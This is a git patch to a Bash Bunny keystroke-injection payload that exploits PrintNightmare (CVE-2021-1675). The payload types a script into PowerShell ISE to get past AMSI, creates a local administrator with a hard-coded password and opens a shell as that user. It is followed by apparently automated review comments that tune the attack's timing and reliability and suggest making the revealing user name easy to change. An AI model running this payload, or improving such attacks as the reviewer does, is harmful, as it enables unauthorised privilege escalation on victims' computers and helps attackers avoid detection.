From efb5f63ad89c4565a68c20727cd42d8347e6f49b Mon Sep 17 00:00:00 2001
From: panicacid
Date: Mon, 5 Jul 2021 02:33:36 +0100
Subject: [PATCH] Bugfix (#433)

* New Payload

Added new PrintNightmare Payload (Quick and dirty)

* Fixed my potty mouth

I'm a child sometimes

* Renamed Payload

* PrintNightmare: Use SWITCH_POSITION in payload path

* Fixing a typo

* Added Delays

Added some delays due to the fact that it was inconsistently reliable; occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required.

* Amending Version Number

I'm a fool

* Updated Readme with proper credit

Co-authored-by: Marc
---
 .../library/execution/PrintNightmare/README.md | 17 ++++++++++++++---
 .../execution/PrintNightmare/payload.txt | 17 ++++++++++++-----
 2 files changed, 26 insertions(+), 8 deletions(-)

diff --git a/payloads/library/execution/PrintNightmare/README.md b/payloads/library/execution/PrintNightmare/README.md
index 022ab13c..0c3814e3 100644
--- a/payloads/library/execution/PrintNightmare/README.md
+++ b/payloads/library/execution/PrintNightmare/README.md
@@ -1,6 +1,17 @@ -# PrintNightmare-BB-Payload -PrintNightmare Payload for the Hak5 BashBunny -Building a quick and dirty condenced verison of https://github.com/calebstewart/CVE-2021-1675 for the Hak5 BashBunny +Title: PrintNightmare +Author: PanicACid +Version: 1.1 + +Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator + +As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! + +Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense. + + +# Purple.............Loading +# Green .............Execute +# Off................Finished Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard. diff --git a/payloads/library/execution/PrintNightmare/payload.txt b/payloads/library/execution/PrintNightmare/payload.txt index 337e9648..614187e4 100644 --- a/payloads/library/execution/PrintNightmare/payload.txt +++ b/payloads/library/execution/PrintNightmare/payload.txt @@ -1,6 +1,6 @@ # Title: Quick and Dirty PrintNightmare -# Author: PanicAcid -# Version: 1.0 +# Author: PanicACid +# Version: 1.1 # # Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator # As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole 
@@ -37,8 +37,12 @@ QUACK ENTER QUACK DELAY 100 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))" QUACK ENTER +QUACK DELAY 500 +QUACK STRING exit +QUACK ENTER +QUACK DELAY 500 QUACK GUI r -QUACK DELAY 300 +QUACK DELAY 500 QUACK STRING powershell_ise.exe QUACK ENTER QUACK DELAY 4000 @@ -46,21 +50,24 @@ QUACK CONTROL d QUACK CONTROL v QUACK CONTROL d QUACK ENTER +QUACK DELAY 2000 QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'" QUACK ENTER +QUACK DELAY 4000 QUACK ALT F4 QUACK GUI r -QUACK DELAY 150 +QUACK DELAY 500 QUACK STRING cmd QUACK DELAY 150 QUACK ENTER QUACK DELAY 150 -QUACK STRING runas /user:Hak5Rules cmd.exe +QUACK STRING "runas /user:Hak5Rules cmd.exe && exit" QUACK ENTER QUACK DELAY 150 QUACK STRING Hak5Rules QUACK DELAY 150 QUACK ENTER + #----------------------------------- # Kill the lights - finished LED FINISH
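Review bot: the README.md hunk (@@ -1,6 +1,17 @@) misnames the control that blocks the script and carries several typos that will be copied into every fork: "Powershell ASAI or whatever it's called" is AMSI (the Antimalware Scan Interface), and "administator" and "PowersShell" are misspelled; suggest `Leverages the following PowerShell script ... to invoke the PrintNightmare vuln and create a local administrator` and `AMSI (the Antimalware Scan Interface) kept picking it up and blocking it, but the same script runs fine when pasted into PowerShell ISE, so we type out the whole thing.` The keyboard-language line ("set to GB for my language, set to yours so you get the correct \'s") is a correctness requirement rather than a footnote, since a wrong layout mangles the backslashes in the `Set-Clipboard` path and the paste never resolves the file; move it up next to the Title/Author/Version block and name the language setting in payload.txt that the user has to change. The new header also drops the only markdown heading (`# PrintNightmare-BB-Payload`) while the LED legend keeps `#` lines that render as headings; keep a real title line such as `# PrintNightmare` at the top and put the Purple/Green/Off legend in a plain list.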
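Review bot: the header hunk of payload.txt (@@ -1,6 +1,6 @@) fixes the author casing and bumps the version but leaves the same "administator" and "ASAI" text in the comment block, so README and payload header now disagree only in the parts that were not corrected; apply the same spelling fixes here (`administrator`, `AMSI`) in this commit rather than a later one. While the header is being touched, it should also state what the payload assumes about the target (a PowerShell that has `Set-Clipboard`, PowerShell ISE installed, and the storage volume still labelled `BashBunny`), because every later step silently depends on those and the file documents none of them.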
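Review bot: in the clipboard hunk (@@ -37,8 +37,12 @@) nothing checks that the volume lookup succeeded before the console is closed: if `gwmi win32_volume -f 'label=''BashBunny'''` returns nothing (different label, drive not yet mounted when the line is typed), `.Name` is null, `gc` throws, `Set-Clipboard` never runs, and the new `exit` 500 ms later closes the window that held the error, so the later CONTROL v in ISE pastes whatever the clipboard already contained and the operator has no indication why. Suggest either dropping the `exit` so the console and any error stay visible, or lengthening the delay and leaving a note that the volume label is assumed. The raised `QUACK DELAY 500` before `powershell_ise.exe` and the unchanged `QUACK DELAY 4000` after it are still fixed guesses with no feedback; say in a comment that they were tuned on the author's machine and that ISE cold start on a slower host may need more, so the next person who hits the "half typed command" symptom from the commit message knows which knob to turn.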
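Review bot: in the execution hunk (@@ -46,21 +50,24 @@) the new `QUACK DELAY 4000` after `Invoke-Nightmare ...` is the only thing standing between the exploit and `QUACK ALT F4`; if the driver install has not finished in four seconds the ISE window is killed mid-run and the following `runas /user:Hak5Rules cmd.exe && exit` fails on a user that was never created, with no visible error because `&& exit` only fires on success. At minimum document the 4000 as empirical, and consider a longer default since a failed run here costs more than a slow one. The delays around the second Run box are also inconsistent with the rest of this patch: `QUACK GUI r` gets `QUACK DELAY 500` but `QUACK STRING cmd` is still followed by `QUACK DELAY 150` before and after `ENTER`, which is the same 150 ms budget the commit message says was unreliable; raise them to 500 as well. Finally `Hak5Rules` appears four times as driver name, user name and password on adjacent lines; pull them into variables at the top of payload.txt so an operator can change the obvious indicator in one place instead of editing the `Invoke-Nightmare` line, the `runas` line and the typed password separately.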